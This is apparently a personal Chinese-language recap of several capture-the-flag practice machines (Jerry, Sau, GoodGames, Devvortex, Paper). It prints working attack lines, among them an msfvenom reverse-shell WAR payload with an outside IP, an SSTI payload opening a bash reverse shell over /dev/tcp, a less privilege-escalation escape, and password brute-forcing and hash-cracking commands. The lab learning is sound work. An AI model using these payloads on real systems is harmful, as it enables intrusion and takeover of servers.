最近打了不少靶場，雖然難度都不算高，但也學到不少東西，中間去打了一周的實網滲透，打完后聯系了一家企業準備面試，感覺面試準備的差不多了，回來繼續打靶，打之前復個小盤總結一下。

jerry

從jerry開始，學到tomcat類的服務器都自帶管理后臺，可以搜相關路徑爆破密碼，接下來學著部署war包實現上傳木馬的功能，

jar -cvf test.war "test.jsp"

并且如果連接不上，還可以用msf生成war包打反彈shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=43.155.67.230 LPORT=1234 -f war -o shell.war

接下來進去之后就拿到flag了，沒有后續操作

Sau

接下來是sau，入口點在request baskets，就是一個流量轉發工具，通過查找CVE達成了ssrf，獲取80端口的訪問權限。進來后同樣截圖丟給gpt，發現是maltrail，且存在未授權訪問漏洞，利用網上下的腳本拿到shell，接下來準備提權，提權的過程比較簡單，systemctl用于查看系統狀態，又是suid權限，關鍵人自帶的分頁程序就是less，從這里學到一個騷技巧，就是長文本用less打提權

!/bin/bash

GoodGames

這個靶場入口點是sql注入，說實話我覺得這個漏洞在當下有點多余了，一個參數化查詢就可以避免，但是不可否認的是它在當前的環境中確實還存在，所以有必要順手測一測（大廠的產品除外）

接下來拿到了一個密碼，md5解密，拿到管理員賬號登錄

沒想到管理員登錄后會有新的功能點（原來利用點在這啊

進去之后有一個修改資料頁面，在這樣的地方可以測一測ssti，通過ssti可以反彈shell

{{self.__init__.__globals__.__builtins__.__import__('os').popen("bash -c 'bash -i >& /dev/tcp/10.10.16.2/6666 0>&1'").read()}} 

反彈的shell不是真的終端，有一些功能限制，需要提升TTY

script -b /bin/bash -p /dev/null

進來之后發現root目錄是空的，找不到flag，這里出現了比較震撼的一點，這玩意竟然是在docker里

先用ifconfig看看接口，發現主機ip，接著看看/etc/passwd，發現沒有用戶augus，但是home里有，說明可能是直接從主機掛載過來的（類似共享文件夾），查看掛載

mount | grep augustus

隨后發現主機和掛載目錄的權限共享，竟然可以主機建文件然后docker給它授權

bash從4.2開始會默認丟棄特權，-p參數保留有效uid和gid

devvotex

從這里開始學到虛擬主機技術，從HOST中添加域名字段爆破子域名

ffuf -u FUZZ.devvortex.htb -w /home/gw/桌面/test/fuzzDicts-master/subdomainDicts/main.txt -fc 302

進dev子域名后發現Joomla cms的未授權訪問，拿到數據庫中用戶名和密碼

進去之后接著搜漏洞去打拿shell，反彈shell如果msf打不通可以直接用curl命令

拿到hash密碼后可以選擇使用hashcat爆破或者在線網站解

hashcat -m 3200 -a 0 pass.txt /usr/share/wordlists/rockyou.txt --show

https://hashes.com/zh/decrypt/hash

進去之后借助less提權

paper

見到檢測wordpress漏洞的工具wpscan，kali有自帶的

枚舉用戶名

wpscan --url http://derpnstink.local/weblog -e u

爆破密碼

wpscan --url http://office.paper -U prisonmike -P /home/gw/桌面/test/fuzzDicts-master/passwordDict/top500.txt

但這里思路歪了，對網站本身的信息收集不夠，應該往未授權查看草稿的方向去打

進來之后發現是一個聊天室rocket，這里版本比較高，直接用現成的是打不通了，但是這個bot有點問題，可以利用其訪問一些文件

拿到.env環境下的rocket配置，猜測跟ssh的密碼是一樣的，嘗試登錄

進去之后傳腳本打cve提權